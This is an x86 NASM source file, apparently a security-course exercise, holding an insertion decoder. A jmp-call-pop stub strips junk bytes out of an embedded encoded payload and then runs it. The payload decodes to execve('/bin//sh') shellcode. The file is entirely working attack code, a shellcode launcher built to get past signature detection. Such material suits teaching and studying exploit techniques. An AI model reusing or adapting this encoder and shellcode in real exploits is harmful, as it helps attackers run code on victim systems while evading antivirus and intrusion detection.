; Filename: insertion-decoder.nasm
; Author:  SLAE-1268
;
;
; Purpose: Insertion Decoder SLAE Q4

global _start			

section .text
_start:

	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx

decode: 
	mov bl, byte [esi + eax]
	xor bl, 0xfe			; compare if the value it 0xfe
	jz short EncodedShellcode
	mov bl, byte [esi + eax + 2]
	mov byte [edi], bl
	inc edi
	add al, 3
	jmp short decode	



call_shellcode:

	call decoder
	EncodedShellcode: db  0x31,0x35,0xf3,0xc0,0x5a,0x82,0x50,0x02,0xf9,0x68,0x09,0xf1,0x2f,0x09,0xe8,0x2f,0x2e,0xab,0x73,0x42,0xab,0x68,0x3d,0x70,0x68,0x2f,0xcd,0x2f,0x40,0x6d,0x62,0x0d,0x9c,0x69,0x28,0xbd,0x6e,0x59,0xe0,0x89,0x29,0xfa,0xe3,0x44,0xf9,0x50,0x29,0xb3,0x89,0x13,0x74,0xe2,0x3b,0x93,0x53,0x2b,0xf2,0x89,0x3c,0xb4,0xe1,0x54,0xe9,0xb0,0x2d,0x95,0x0b,0x34,0xe6,0xcd,0x54,0xaa,0x80,0x07,0xe8, 0xfe

	



